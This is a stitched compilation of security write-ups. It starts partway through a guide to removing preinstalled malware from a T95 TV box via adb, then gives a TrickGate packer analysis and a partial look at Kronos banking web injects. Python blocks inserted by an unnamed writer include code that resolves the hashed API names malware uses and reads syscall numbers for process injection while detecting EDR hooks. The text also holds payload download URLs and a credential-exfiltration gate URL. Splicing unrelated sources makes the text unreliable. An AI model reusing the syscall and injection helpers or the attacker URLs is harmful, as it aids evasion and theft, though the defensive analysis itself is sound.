Scroll down to Build
Press Build several times until it states You are now a Developer!

Press the Back button to return to settings screen
Navigate to More Settings
Navigate to Device Preferences > Developer options
Scroll down to Debugging section
Ensure these toggle switches are on
USB debugging (should be on by default)
USB0 device mode enable

Now that we have adb installed, and the T95 TV box in Developer Mode the next step is to test adb.

You will need a cable that can join your computer to the T95, which has a USB-A port. (If you can find USB-A to USB-A cable sitting around your place, congratulations, you have the rarest cable known to myself.)

With your computer connected to the T95 TV box, open a terminal (this is Command Prompt on Windows) and type:

adb devices

There should be an ID number followed by the word device under List of devices attached, for example:

List of devices attached

12345c3006c0c721d0e     device

Now you are ready to remediate some nasties!

Removing DGBLuancher

Before we remediate DGBLuancher, be aware that DGBLuancher is the T95 TV box’s launcher app. A launcher app is the app used to launch and run everything on an Android device. For example, all your app icons, widgets, clock, getting to Settings, etc. Which leads me to this warning:

Uninstalling DGBLuancher without first installing another launcher to replace it will render the Android device useless.

The good news is that you can still use adb to send commands even without a launcher. So, make sure to set that up first.

You can use whatever TV launcher you decide. There are many good choices on Google Play to choose from.  Personally, I just chose the first one on the list, which happened to be ATV Launcher. As long as it’s malware-free, anything is better than DGBLuancher!

But before we begin, a disclaimer is necessary:

Proceed at your own risk! Neither I, nor Malwarebytes, can guarantee this will not damage your Android device and we accept no responsibility if it does. By proceeding, you take the risk and responsibility upon yourself.

Now usually, I would highly recommend using Google Play to install apps instead of a third-party app store. It gives you the added protection of Google Play Protect, and it also ensures the app will work with your make, model, and OS version. However, since this was a preinstalled, malware-infested TV box that was already rooted, that was bought for around $30 on Amazon… you may choose to make an expedient exception this one time.

The options are:

Connect the TV box to the Internet to download a TV launcher from Google Play, whilst letting the malware do nasty things in the meantime.
Download a TV launcher from a third-party app store, such as ATV Launcher from APKPure, and then drag-drop it to the Downloads folder on the TV Box. Then install it from the FileManager app already on the TV box. All while not opening up the flood gates to malware-riddled network traffic.

Re-read that disclaimer above and make a decision you’re willing to take full responsibility for, then proceed.

Now that you have another TV launcher installed, you can remove DGBLuancher using the following adb command:

adb shell pm uninstall -k --user 0 com.swe.dgbluancher

If, for whatever reason, you need to revert to DGBLuancher, here’s the command:

adb shell pm install -r --user 0 /system/priv-app/Launcher10/Launcher10.apk

Note that the above pm uninstall command uses -k to, quoting the documentation, “keep the data and cache directories around after package removal”, and --user 0 to uninstall only for the current user. Therefore, it is a safer method to uninstall system level apps because you can reinstall from the APK stored in the system folder.

At this point, it is a good idea to restart the TV box. With DGBLuancher now uninstalled and a new launcher running, Corejava classes.dex is neutralized. You can now use the box safely. But if you’d rather be safe than sorry, you can move on to removing Corejava for good.

Removing Corejava

A big shout out to Daniel for providing this clever method of removing and stopping Corejava from being created again in his cleanup script!

First, you need to gain root access:

adb root

Now, enter shell:

adb shell

From shell, check to confirm that Corejava exists (the output will tell you):

test -d /data/system/Corejava/ && echo "You are infected with Corejava!!!" && cd /data/system/Corejava/ || echo "Corejava does not exist"

If you get output, “You are infected with Corejava!!!”, then move on to the removal process. That starts with removing /data/system/Corejava/ and anything in it:

rm -rf /data/system/Corejava

Now that it’s gone, we need to stop it from ever coming back. Using the command touch, create an empty file named Corejava in /data/system:

touch /data/system/Corejava

Next, change the permissions so nothing can modify it:

chmod 000 /data/system/Corejava

This last step is key. It uses the chattr command located under busybox, which holds common legacy Unix commands, to set the attribute to +i. Why? Because “a file with the ‘i’ attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file, most of the file’s metadata cannot be modified, and the file cannot be opened in write mode.” In other words, game over Corejava!:

busybox chattr +i /data/system/Corejava

With these settings in place, whenever the system tries to create /data/system/Corejava, it will be denied as seen in the output from logcat | grep Corejava run in shell:

FileUtils: Failed to chmod(/data/system/Corejava): android.system.ErrnoException: chmod failed: EPERM (Operation not permitted)
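As an added example (my own, not code from the Malwarebytes write-up), the two remediation steps above can be turned into a small planner: it parses the output of pm list packages -f and ls -la /data/system as captured over adb shell, confirms the indicators, and only emits the launcher uninstall once a replacement launcher is installed. The sample outputs are constructed, and com.example.tvlauncher is a placeholder for whatever launcher you actually installed.

```python
import re

# Indicators and commands taken from the write-up above.
MALICIOUS_LAUNCHER = "com.swe.dgbluancher"
COREJAVA_DIR = "/data/system/Corejava"

# Placeholder: replace with the package name of the launcher you installed
# (constructed value, not a real package name).
REPLACEMENT_LAUNCHERS = {"com.example.tvlauncher"}


def parse_pm_list(output: str) -> dict:
    """Parse `pm list packages -f` output into {package_name: apk_path}."""
    pkgs = {}
    for line in output.splitlines():
        m = re.match(r"package:(.+)=([\w.]+)$", line.strip())
        if m:
            pkgs[m.group(2)] = m.group(1)
    return pkgs


def corejava_is_directory(ls_output: str) -> bool:
    """True if `ls -la /data/system` lists Corejava as a directory.

    After the touch / chmod 000 / chattr +i fix, Corejava is an empty
    regular file (mode ----------), so this correctly returns False.
    """
    for line in ls_output.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[-1] == "Corejava":
            return fields[0].startswith("d")
    return False


def plan_remediation(pkgs: dict, corejava_dir: bool) -> list:
    """Return the ordered commands to run over `adb shell` (after `adb root`).

    The launcher uninstall is refused unless a replacement launcher is
    already installed: without any launcher the box is unusable.
    """
    cmds = []
    if MALICIOUS_LAUNCHER in pkgs:
        if not REPLACEMENT_LAUNCHERS & set(pkgs):
            raise RuntimeError(
                "install a replacement launcher before removing " + MALICIOUS_LAUNCHER)
        cmds.append(f"pm uninstall -k --user 0 {MALICIOUS_LAUNCHER}")
    if corejava_dir:
        cmds += [
            f"rm -rf {COREJAVA_DIR}",
            f"touch {COREJAVA_DIR}",
            f"chmod 000 {COREJAVA_DIR}",
            f"busybox chattr +i {COREJAVA_DIR}",
        ]
    return cmds


# Constructed sample output, shaped like the real commands' output.
PM_OUTPUT_INFECTED = """\
package:/system/priv-app/Launcher10/Launcher10.apk=com.swe.dgbluancher
package:/data/app/com.example.tvlauncher-1/base.apk=com.example.tvlauncher
package:/system/priv-app/Settings/Settings.apk=com.android.settings
"""
LS_OUTPUT_INFECTED = """\
drwxrwx--x 2 system system 4096 2023-01-20 10:00 Corejava
-rw------- 1 system system  512 2023-01-20 10:00 packages.xml
"""

if __name__ == "__main__":
    pkgs = parse_pm_list(PM_OUTPUT_INFECTED)
    for cmd in plan_remediation(pkgs, corejava_is_directory(LS_OUTPUT_INFECTED)):
        print("adb shell", cmd)
```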

Adups

Adups and I have had a fiery relationship. We have crossed paths several times. This time though, I come to Adups’ defense. Not all Adups versions are malicious, and I see no malicious activity from the version on the T95 TV box.

Although the existence of it prompted me into wanting to analyze the T95 TV box, it was not the culprit this time. That being said, you can follow the tutorial Uninstalling Adups and other preinstalled malware via adb command line tool just to make sure you are free and clear of any future malware. With Adups’ shady past, it probably isn’t a bad idea. Just remember, Adups is the app used to update the system, including security patches. Luckily, the tutorial will show you how to restore Adups in case you want or need to run an update.

“Budget” should not mean “malware”

Once again, thank you to Daniel Milisic for bringing this to our attention. I’ll end by saying buying “budget” should not mean “malware infested”, as we’ve seen disgustingly in the past. Especially when the device is bought through a reputable online store like Amazon. I hope this analysis will help others remediate this bad actor. Stay safe out there!

Samples

Malicious classes.dex file

MD5: F9802B1168D5832D32C229776CD9B9AA

Malicious Launcher APK

Package Name: com.swe.dgbluancher

MD5: EB850022E4269BB1DAB9FC5D2B0B734F

Research by: Arie Olshtein

Executive summary

Initially observed in July 2016, TrickGate is a shellcode-based packer offered as a service to hide malware from EDRs and antivirus programs.

Over the last 6 years, TrickGate was used to deploy the top members of the “Most Wanted Malware” list, such as Cerber, Trickbot, Maze, Emotet, REvil, Cobalt Strike, AZORult, Formbook, AgentTesla and more.

TrickGate managed to stay under the radar for years because it is transformative – it undergoes changes periodically. This characteristic caused the research community to identify it by numerous attributes and names.

While the packer’s wrapper changed over time, the main building blocks within TrickGate shellcode are still in use today.

Check Point Threat Emulation successfully detects and blocks the TrickGate packer.

Introduction

Cyber criminals increasingly rely on packers to carry out their malicious activities. The packer, also referred to as “Crypter” and “FUD” on hacking forums, makes it harder for antivirus programs to detect the malicious code. By using a packer, malicious actors can spread their malware more easily with fewer repercussions. One of the main characteristics of a commercial Packer-as-a-Service is that it doesn’t matter what the payload is, which means it can be used to pack many different malicious samples. Another important characteristic of the packer is that it is transformative – the packer’s wrapper is changed on a regular basis which enables it to remain invisible to security products.

TrickGate is a good example of a strong, resilient Packer-as-a-Service, which has managed to stay under the cyber security radar for many years and continually improve itself in different ways. We managed to track TrickGate’s breadcrumb trail despite its propensity for rapidly changing its outer wrapper.

Although a lot of excellent research was conducted on the packer itself, TrickGate is a master of disguises and has been given many names based on its varied attributes. Its names include “TrickGate”, “Emotet’s packer”, “new loader”, “Loncom”, “NSIS-based crypter” and more. We connect the dots from previous research and with high confidence point to a single operation that seems to be offered as a service.

TrickGate over the years.

We first observed TrickGate at the end of 2016. Back then, it was used to deliver Cerber ransomware. Since that time, we have continually observed TrickGate and found it is used to spread all types of malware tools, such as ransomware, RATs, info-stealers, bankers, and miners. We noticed that many APT groups and threat actors regularly use TrickGate to wrap their malicious code to prevent detection by security products. TrickGate has been involved in wrapping some of the best-known top-distribution malware families, such as Cerber, Trickbot, Maze, Emotet, REvil, CoinMiner, Cobalt Strike, DarkVNC, BuerLoader, HawkEye, NetWire, AZORult, Formbook, Remcos, Lokibot, AgentTesla, and many more.

Figure 1 – TrickGate over the years.

TrickGate Distribution.

We monitored between 40 to 650 attacks per week during the last 2 years. According to our telemetry, the threat actors who use TrickGate primarily target the manufacturing sector, but also attack education facilities, healthcare, finance and business enterprises. The attacks are distributed all over the world, with an increased concentration in Taiwan and Turkey. The most popular malware family used in the last 2 months is Formbook with 42% of the total tracked distribution.

Figure 2 – TrickGate statistics during Oct-Nov 2022.

Attack flow:

An overview of the attack flow that is commonly found in attacks involving TrickGate:

Initial access

The initial access made by the packer’s users can vary significantly. We monitor the packed samples spreading mainly via phishing emails with malicious attachments, but also via malicious links.

Initial files

The first stage mainly comes in the form of an archived executable, but we monitored many file types and delivery permutations that lead to the same shellcode. We observed the following file types at the first stage:

Archive: 7Z * ACE * ARJ * BZ * BZ2 * CAB * GZ * IMG * ISO * IZH * LHA * LZ * LZH * R00 * RAR * TAR * TGZ * UU * UUE * XZ * Z * ZIP * ZIPX * ZST.

Executable: BAT * CMD * COM * EXE * LNK * PIF * SCR.

Document: DOC * DOCX * PDF * XLL * XLS * XLSX * RTF.

Shellcode loader

The second stage is the shellcode loader which is responsible for decrypting and running the shellcode.

We noticed 3 different types of code language used for the shellcode loader. NSIS script, AutoIT script and C all implement similar functionality.

Shellcode

The shellcode is the core of the packer. It’s responsible for decrypting the payload and stealthily injecting it into a new process.

Payload

The payload is the actual malicious code and is responsible for carrying out the intended malicious activity. The payloads differ according to the actor who used the packer.

Figure 3 – Attack flow.

Examples of the different attack flows we observed in the past year:

FEB 24, 2022

Figure 4 – LNK flow

RAR: 3f5758da2f4469810958714faed747b2309142ae

LNK: bba7c7e6b4cb113b8f8652d67ce3592901b18a74

URL: jardinaix[.]fr/w.exe

EXE: 63205c7b5c84296478f1ad7d335aa06b8b7da536

Mar 10, 2022

Figure 5 – PDF flow.

PDF: 08a9cf364796b483327fb76335f166fe4bf7c581

XLSX: 36b7140f0b5673d03c059a35c10e96e0ef3d429a

URL: 192.227.196[.]211/t.wirr/XLD.exe

EXE:  386e4686dd27b82e4cabca7a099fef08b000de81 

Oct 3, 2022

Figure 6 – SFX flow.

7Z: fac7a9d4c7d74eea7ed87d2ac5fedad08cf1d50a

EXE: 3437ea9b7592a4a05077028d54ef8ad194b45d2f 

Nov 15, 2022

Figure 7 – AutoIT flow.

R11: 755ee43ae80421c80abfab5481d44615784e76da

EXE: 666c5b23521c1491adeeee26716a1794b09080ec

Shellcode loader

The Shellcode loader usually contains a single function which is responsible for decrypting and loading the shellcode into memory. These are the basic steps:

Read the encrypted shellcode. The encrypted shellcode can be stored in a file on the disk, in the “.rdata” section or as a resource.

Allocate memory for the shellcode, usually by calling VirtualAlloc.

Decrypt the shellcode.

Trigger the shellcode. As we explain below, this can be done using a direct call or by callback functions.

Figure 8 – Shellcode loader – deobfuscated AutoIT version.

Figure 9 – Shellcode loader C version.

In the more recent versions of TrickGate, the shellcode loader abuses the “Callback Functions” mechanism. The loader utilizes many native API calls which take a memory address as an argument of a callback function. Instead of the Callback Function, the loader passes on the address of the newly allocated memory which holds the shellcode.  When Windows reaches the point of the registered events, the DriverCallback executes the shellcode. This technique breaks the flow of the behavior we’re monitoring by having Windows OS run the shellcode at an unknown time. In the shellcode loader above, you can see two examples of this in the images “EnumTimeFormatsA” and “EnumSystemCodePagesW”. 

Shellcode similarity and TrickGate vacation

Usually, when we find code similarity between unrelated malware families, it is more likely that the actors copied from a mutual resource or shared some pieces of code. For a long time, we noticed a unique injection technique that incorporated the use of direct kernel syscalls, but we didn’t realize the significance, thinking it was probably a fragment of shared code.  What caused us to suspect that this unique injection may be controlled solely by one actor is the fact that we saw an occasional “time-off” in operation, and it is very unlikely that several different groups will take a break at exactly the same time. The last break, which was more than 3 months long (from June 13, 2022 to September 26, 2022) was an opportunity for us to verify our suspicion, and dive into the shellcode.

Figure 10 – TrickGate in the last 2 years.

To verify our suspicion, we started to analyze samples across the timeline.

We started our analysis by comparing a fresh sample to an older one. For this test we used

2022-12_Remcos: a1f73365b88872de170e69ed2150c6df7adcdc9c

compared to

2017-10_CoinMiner: 1a455baf4ce680d74af964ea6f5253bbeeacb3de

We know from the behavioral analysis that a similarity exists in the shellcode, so we ran the samples until the point where the shellcode is decrypted in memory and then dumped the shellcode to disk. Next, we used the Zynamics BinDiff tool (owned by Google) to check similarities in both shellcodes. The results showed a 50% similarity between the tested shellcodes. Fifty percent over a long period of time – more than five years – for quite a large piece of shellcode (~5kb) is unexpected. This automatically raised suspicions that this might be a maintained shellcode, but we needed further evidence in the form of similarity analysis over shorter periods of time to see if it had changed gradually.

Figure 11 – BinDiff result on shellcode extracted 2022-12_Remcos: a1f73365b88872de170e69ed2150c6df7adcdc9c VS 2017-10_CoinMiner: 1a455baf4ce680d74af964ea6f5253bbeeacb3de.

For further analysis, we took random samples from the past 6 years. For each sample, we dumped the shellcode and checked the similarity of the result over time. As you can see in the following graph, the results point to small changes made over time. On the left side we see samples dating from 2016 till 2020 showing about 90% similarity. On the right side, we see a forked version showing a high similarity within itself, but lower similarity with the original version on the left.

Figure 12 – Bindiff result on extracted shellcodes.

We then dived into the gap between the shellcodes to see the impact caused by:

Different compilers

Obfuscations

Evasion modules

Persistence modules (run the packed payload at the next login)

Function order

Local variables vs structures

After we cleaned the gap noise, we got the core functionality of the packer. The author constantly maintained the shellcode but used “building blocks” as described in the next section.

Figure 13 – Control flow graph of the main injection function. Diffing 2016-07_Cerber: 24aa45280c7821e0c9e404f6ce846f1ce00b9823 VS 2022-12_Remcos: a1f73365b88872de170e69ed2150c6df7adcdc9c

Figure 14 – Diffing the direct kernel call of NtWriteVirtualMemory. 2022-12_Remcos: a1f73365b88872de170e69ed2150c6df7adcdc9c VS 2016-07_Cerber: 24aa45280c7821e0c9e404f6ce846f1ce00b9823

TrickGate shellcode’s construction elements

As mentioned above, the shellcode has been constantly updated, but the main functionalities exist on all the samples since 2016. An overview of the shellcode’s building-blocks can be described as follows:

API hash resolving.

Load to memory and decrypt the payload.

Injection using direct kernel calls.

Manually map a fresh copy of ntdll.

Dynamically retrieve the kernel syscall numbers.

Invoke the desired syscalls.

Inject and run the payload.

API hash resolving.

When we analyzed the TrickGate code, no constant strings could be found. TrickGate often intentionally adds clean code and debug strings to throw off analysis. To hide the strings it needs, and with them its intentions, TrickGate uses a common technique called API hashing, in which every required Windows API is referenced by a hash value instead of by name. Until January 2021, TrickGate hashed the API name strings with CRC32. In newer versions, TrickGate switched to custom hash functions.

The equivalent Python hashing functions used in the last 2 years:

def hash_str_ror1(s):
    # Custom hash used since January 2021; h is only masked to 32 bits at the end
    h = 8998
    for c in s:
        h += ord(c) + (((h >> 1) & 0xffffffff) | ((h << 7) & 0xffffffff))
    return h & 0xffffffff

def hash_str21(s):
    # Second custom hash: multiply-by-0x21 polynomial hash, masked to 32 bits
    h = 8998
    for c in s:
        h = ord(c) + (0x21 * h)
    return h & 0xffffffff

The following Kernel32 API names have been hashed in TrickGate samples:

API name            CRC32        hash_str_ror1  hash_str21
CloseHandle         0xB09315F4   0x7fe1f1fb     0xd6eb2188
CreateFileW         0xA1EFE929   0x7fe63623     0x8a111d91
CreateProcessW      0x5C856C47   0x7fe2736c     0xa2eae210
ExitProcess         0x251097CC   0x7f91a078     0x55e38b1f
GetCommandLineW     0xD9B20494   0x7fb6c905     0x2ffe2c64
GetFileSize         0xA7FB4165   0x7fbd727f     0x170c1ca1
GetModuleFileNameW  0xFC6B42F1   0xff7f721a     0xd1775dc4
GetThreadContext    0x649EB9C1   0x7fa1f993     0xc414ffe3
IsWow64Process      0x2E50340B   0xff06dc87     0x943cf948
ReadFile            0x095C03D0   0x7fe7f840     0x433a3842
ReadProcessMemory   0xF7C7AE42   0x7fa3ef6e     0x9f4b589a
SetThreadContext    0x5688CBD8   0xff31bf16     0x5692c66f
VirtualAlloc        0x09CE0D4A   0x7fb47add     0xa5f15738
VirtualFree         0xCD53F5DD   0x7f951704     0x050a26af

Figure 15 – API hashing.
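When a new sample turns up, the practical question is which of these schemes it uses and which exports its constants name. The following is an added example, not Check Point's code or anything from TrickGate itself: it re-implements the two custom hashes above (behaviour unchanged), adds standard CRC32 for the pre-2021 samples, and, given the 32-bit constants pulled out of a shellcode, picks the scheme that resolves the most of them against a candidate export list. The candidate list here is just the Kernel32 names from the table; the `identify_scheme`/`unresolved` helpers and the `min_hits` threshold are my own choices.

```python
import zlib

# The two custom hash routines from the analysis above, behaviour unchanged so
# the values match the table (h is only masked to 32 bits at the end, as in the
# original), plus standard CRC32 for the pre-2021 samples.
def hash_str_ror1(s: str) -> int:
    h = 8998
    for c in s:
        h += ord(c) + (((h >> 1) & 0xFFFFFFFF) | ((h << 7) & 0xFFFFFFFF))
    return h & 0xFFFFFFFF


def hash_str21(s: str) -> int:
    h = 8998
    for c in s:
        h = ord(c) + (0x21 * h)
    return h & 0xFFFFFFFF


def crc32_hash(s: str) -> int:
    return zlib.crc32(s.encode("ascii")) & 0xFFFFFFFF


SCHEMES = {
    "crc32": crc32_hash,
    "hash_str_ror1": hash_str_ror1,
    "hash_str21": hash_str21,
}

# Candidate export names: the Kernel32 APIs from the table. For a real sample
# this list would be every export of the DLLs the stub is expected to resolve
# (e.g. dumped from kernel32.dll and ntdll.dll with pefile).
CANDIDATES = [
    "CloseHandle", "CreateFileW", "CreateProcessW", "ExitProcess",
    "GetCommandLineW", "GetFileSize", "GetModuleFileNameW", "GetThreadContext",
    "IsWow64Process", "ReadFile", "ReadProcessMemory", "SetThreadContext",
    "VirtualAlloc", "VirtualFree",
]


def build_tables(names):
    """hash -> export name, precomputed once per scheme."""
    return {scheme: {fn(n): n for n in names} for scheme, fn in SCHEMES.items()}


def identify_scheme(observed, names=CANDIDATES, min_hits=3):
    """Given the 32-bit constants pulled out of a shellcode, pick the hashing
    scheme that resolves the most of them against the candidate list.
    Returns (scheme, {hash: name}); (None, {}) when nothing reaches min_hits,
    which usually means a new custom hash (as happened in January 2021) or a
    candidate list that is missing the right DLL."""
    best_scheme, best_hits = None, {}
    for scheme, table in build_tables(names).items():
        hits = {h: table[h] for h in observed if h in table}
        if len(hits) > len(best_hits):
            best_scheme, best_hits = scheme, hits
    if len(best_hits) < min_hits:
        return None, {}
    return best_scheme, best_hits


def unresolved(observed, hits):
    """Constants the chosen scheme could not name: extend the candidate list."""
    return sorted(h for h in observed if h not in hits)
```

The `observed` input is whatever immediate operands the shellcode compares against (for example every `push imm32` or `mov reg, imm32` in the resolver loop); anything left in `unresolved` after a match is either an export from a DLL not yet in the candidate list or a value that is not an API hash at all.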

Load to memory and decrypt the payload.

TrickGate always changes the way the payload is decrypted, so unpacking solutions that work on the samples we observe now will not work on the next update. Most of the samples use a custom decryption method, but in older samples we also saw known ciphers such as an RC4 implementation, or calls to the Windows cryptography APIs.

Injection using direct kernel calls:

After decrypting the payload, the shellcode injects it into a newly created process. The process is created suspended (the CREATE_SUSPENDED flag), and the injection is done through a set of direct calls to the kernel. For every one of these ntdll API calls:

NtCreateSection

NtMapViewOfSection

NtUnmapViewOfSection

NtWriteVirtualMemory

NtResumeThread

The following actions are executed:

Manually map a fresh copy of ntdll from the disk.

Resolve the address of a given hash in the newly mapped ntdll.

Dynamically extract the requested System Service Number (SSN).

Direct kernel invoke with the SSN:

For Windows 64-bit: switch to 64-bit mode using the “Heaven’s Gate” technique and execute SYSCALL with the SSN.

For Windows 32-bit: execute SYSENTER with the SSN.

Figure 16 – Function call graph SYSCALL ID from Manually mapped DLL.

The way TrickGate invokes direct syscalls is intriguing, as it uses a technique similar to Hell’s Gate. Hell’s Gate is a technique presented publicly in 2020 as a way to dynamically retrieve and execute direct syscall numbers. Here we have samples dating back to 2016 that accomplish the equivalent: retrieving and executing direct system calls without the need to maintain a hard-coded table of syscall numbers per Windows build (the numbers change between versions, which is what makes a static table fragile).

Figure 17 – SSN dynamically extracted. 2016-07_Cerber: 24aa45280c7821e0c9e404f6ce846f1ce00b9823

The injection module has been the most consistent part over the years and has been observed in all TrickGate shellcodes since 2016.
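The “resolve export, read its SSN” stage above is easiest to understand with bytes in hand. The following is an added example, not Check Point's code or TrickGate's: a Python parser that reads the System Service Number from the prologue of an Nt* export as it would be found in a freshly mapped ntdll, builds the small table the injection needs, and refuses to proceed when the loaded copy has been hooked (which is the reason a packer maps a clean copy from disk in the first place). The stub byte patterns are the well-known ntdll layouts, simplified; the export tables are constructed, and the SSN values are illustrative, not taken from any particular Windows build. Nothing here invokes a syscall.

```python
import struct

# Assumed prologue shapes for an Nt* export (simplified ntdll stub layouts):
#   x64:  4C 8B D1           mov r10, rcx
#         B8 <SSN:u32>       mov eax, SSN
#         ...                (later: 0F 05 syscall)
#   x86:  B8 <SSN:u32>       mov eax, SSN
#         BA <addr:u32>      mov edx, transition routine
#         FF D2 / FF 12      call edx / call [edx]   (ends in sysenter)
X64_PREFIX = b"\x4C\x8B\xD1\xB8"
X86_PREFIX = b"\xB8"

INJECTION_CALLS = [
    "NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection",
    "NtWriteVirtualMemory", "NtResumeThread",
]


def extract_ssn(stub: bytes):
    """Return (arch, ssn) read from the first bytes of an export.
    ('hooked', None) means the prologue was overwritten with jmp rel32, the
    usual shape of a user-mode hook: the value read from the loaded ntdll would
    be wrong, which is why TrickGate maps a fresh copy from disk first."""
    if stub[:1] == b"\xE9":
        return "hooked", None
    if stub.startswith(X64_PREFIX) and len(stub) >= 8:
        return "x64", struct.unpack_from("<I", stub, 4)[0]
    if stub.startswith(X86_PREFIX) and len(stub) >= 5:
        return "x86", struct.unpack_from("<I", stub, 1)[0]
    return "unknown", None


def make_x64_stub(ssn: int) -> bytes:
    return X64_PREFIX + struct.pack("<I", ssn) + b"\x0F\x05\xC3"


def make_x86_stub(ssn: int) -> bytes:
    return X86_PREFIX + struct.pack("<I", ssn) + b"\xBA\x00\x00\x00\x00\xFF\xD2\xC3"


def make_hooked_stub(ssn: int) -> bytes:
    # jmp rel32 to a hook; the original first five bytes are gone
    return b"\xE9\x00\x00\x00\x00" + make_x64_stub(ssn)[5:]


# Constructed export tables standing in for (a) the fresh ntdll mapped from disk
# and (b) the copy already loaded in the process, with one export hooked.
# SSNs are illustrative only: they change between Windows builds, which is
# exactly why the packer reads them at run time instead of hard-coding them.
FRESH_NTDLL_X64 = {
    "NtCreateSection": make_x64_stub(0x4A),
    "NtMapViewOfSection": make_x64_stub(0x28),
    "NtUnmapViewOfSection": make_x64_stub(0x2A),
    "NtWriteVirtualMemory": make_x64_stub(0x3A),
    "NtResumeThread": make_x64_stub(0x52),
}
LOADED_NTDLL_X64 = dict(FRESH_NTDLL_X64, NtWriteVirtualMemory=make_hooked_stub(0x3A))


def hooked_exports(exports, wanted=INJECTION_CALLS):
    """Names whose prologue no longer starts with the expected stub."""
    return [n for n in wanted if extract_ssn(exports[n])[0] == "hooked"]


def syscall_table(exports, wanted=INJECTION_CALLS):
    """Name -> SSN for every call the injection needs; stops on a hooked or
    unrecognised stub rather than guessing a number."""
    table = {}
    for name in wanted:
        arch, ssn = extract_ssn(exports[name])
        if ssn is None:
            raise ValueError(f"{name}: cannot read SSN ({arch} stub)")
        table[name] = ssn
    return table
```

On a real system the export bytes come from the module's export directory (for instance via pefile on the on-disk ntdll.dll, or by reading the process memory of the mapped copy); `hooked_exports` run against the loaded copy is also a cheap way for a defender to see which Nt* prologues an EDR has patched, which is precisely what the fresh mapping is meant to sidestep.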

Conclusion

We have correlated the most wanted malware families of the last 6 years to a single Packer-as-a-Service named TrickGate, whose transformative abilities make it hard to identify and track. Understanding the packer’s building blocks is of crucial importance for detecting the threat: blocking the packer protects against the threat at an early stage, before the payload starts to run.

Packers often get less attention, as researchers tend to focus their attention on the actual malware, leaving the packer stub untouched. However, the identified packer can now be used as a focal point to detect new or unknown malware.

Analyzed samples.

03d9cbee9522c2c8a267b7e9599a9d245c35c7ac

043ae57e01ebd0a96fa30b92821b712504cfde03

1a455baf4ce680d74af964ea6f5253bbeeacb3de

22f26496f2e8829af9f5cfcd79c47e03fe9a21bb

24aa45280c7821e0c9e404f6ce846f1ce00b9823

30e0181a018fa7dcbd2344dc32adcf77cf840ebe

3437ea9b7592a4a05077028d54ef8ad194b45d2f

3817bad277aa50016e08eed35e92d4a3b5247633

4380044a9517a08514459005836c5f92e4a33871

4f6fa448454b581d6c8e7aa6ed3ef72e66062bf8

666c5b23521c1491adeeee26716a1794b09080ec

75d999d431819311abf8bd048cd084acdcd5f4e1

7f456f8b01fc8866aeed4678a14479b6eaa62fed

975629358bfbba0344ef0dae4d22697ceb2a32b4

977800bd7be3c5c9f2c0dac7f4806e586d8f7b1a

9f20d00b4ec898a33e130720d4d29e94070e1575

a1f73365b88872de170e69ed2150c6df7adcdc9c

a661541c4cbeb1db859f6cec6c53979b5633c75e

afbe838c881e5b223351ff8fa05ddeb3678581ba

b2d58dfee71ce9c509fab1f00ce04c9526c60695

e6dccf4b1fc5ab116b6bc1321346b35dbf42f387

fa5c79321dd4cc2fea795d6ebe2e823abe33ca6f

The post Following the Scent of TrickGate: 6-Year-Old Packer Used to Deploy the Most Wanted Malware appeared first on Check Point Research.


The Evolution of Kronos Malware

The Kronos malware is believed to have originated from the leaked source code of the Zeus malware, which was sold on the Russian underground in 2011. Kronos continued to evolve and a new variant of Kronos emerged in 2014 and was reportedly sold on the darknet for approximately $7,000. Kronos is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims.

After remaining dormant for a few years, the Kronos banking trojan reemerged in 2018, under the name Osiris, and was used in a banking trojan campaign. While there were some differences between the two strains, both Osiris and Kronos shared the same technique for stealing information.

Kronos made yet another resurgence, this time combined with ransomware, and in late 2022 IBM Security Trusteer saw an increase in Kronos malware activity in Mexico. In these attacks, it was used to launch JavaScript web injects against financial institutions through a malicious Chrome extension.

A Brief Review of the Kronos Malware Attack in Mexico

The first victim of the 2022 Kronos campaign had the malware installed automatically through a malicious Chrome extension called “Seguridad” (Security).

This is the first time we have observed malware utilizing a chrome extension with web injects on financial institutions.

The Kronos malware uses a configuration file to identify targeted pages within a victim’s web browsing session. Once a victim navigates to one of these pages, the malware initiates a call to an external resource and injects a malicious JavaScript payload. Once the malicious Chrome extension is installed, if the user attempts to access one of the targeted Mexican financial institutions, the extension injects malicious JavaScript named “8vZ9d1-ad.js” or “ok.js”:

This payload can then be used to steal sensitive information from the victim’s device.

Stealthy Web Injection Capabilities

During an investigation of the Kronos malware’s web-injects, it was found that the main goal of the attacker is to steal sensitive information from the victim, such as login credentials (username, password), mobile tokens, OTP tokens, and more. These stolen pieces of information can then be used by the attacker to gain unauthorized access to the victim’s accounts or to commit other fraudulent activities.

Example for Web-Inject:

Once a user is infected with the Kronos malware, the malware may wait for the user to enter their login credentials on a targeted website. At this point, the JavaScript component of the malware will begin to inject itself into the victim’s web browser, displaying a fake loading animation (commonly known as a “loader gif”) in order to obscure the fact that the user’s information is being stolen. This technique is commonly used by malware to avoid detection and increase the likelihood of successfully stealing sensitive information from the victim:

The malware may then prompt the user for additional sensitive information, such as a telephone number, under the guise of verifying the user’s identity. This information is then used by the attacker for various nefarious purposes.

Main JavaScript functions:

Function                      Purpose
Ask_user                      Send command “forgot username”
Ask_pass                      Enter password
Ask_mobile_access_token       Ask the user to enter the mobile access token
Ask_mobile_confirmation       Ask for mobile token confirmation
Ask_otp_access_token          Ask for the OTP from the physical token
Ask_calc_access_token         Second confirmation for token
Ask_calc_confirmation_token   Third confirmation for token
Ask_email                     Ask for email address
Ask_info                      Request landline and cellphone numbers

Once the malware has fully initialized and its various functions have been enabled, it will use the “send_home” function to exfiltrate any stolen information back to the attacker’s server. This function is typically used to transmit sensitive data that has been collected by the malware during the victim’s web browsing session:

The “send_home” function is used by the Kronos malware to transmit stolen information to the attacker’s command and control (C&C) server. This transmission typically includes a unique token and a link to the financial institution from which the information was stolen. This allows the attacker to easily identify the source of the stolen information and track the progress of the malware’s activities.

Example: hxxps://tomolina.top/uadmin/gate.php?pl=token&link=hsbc_mx1.1

C&C Panel (uadmin)

The “uadmin” panel is a C&C interface used by attackers to manage various aspects of their malware campaigns. It allows the attacker to configure web injects and other options, as well as view sensitive information that has been collected from victims. This information, which may include login credentials, mobile tokens, and OTP codes, is typically used by the attacker for various nefarious purposes.

Inside C&C (uadmin):

The source code for the “uadmin” panel has been leaked in the past, and below is an example of the main admin code:

Main page:

Main Token Page:

This page contains logs of infected victims, including:

The last time the victim connected to the targeted bank.
The victim’s IP address.
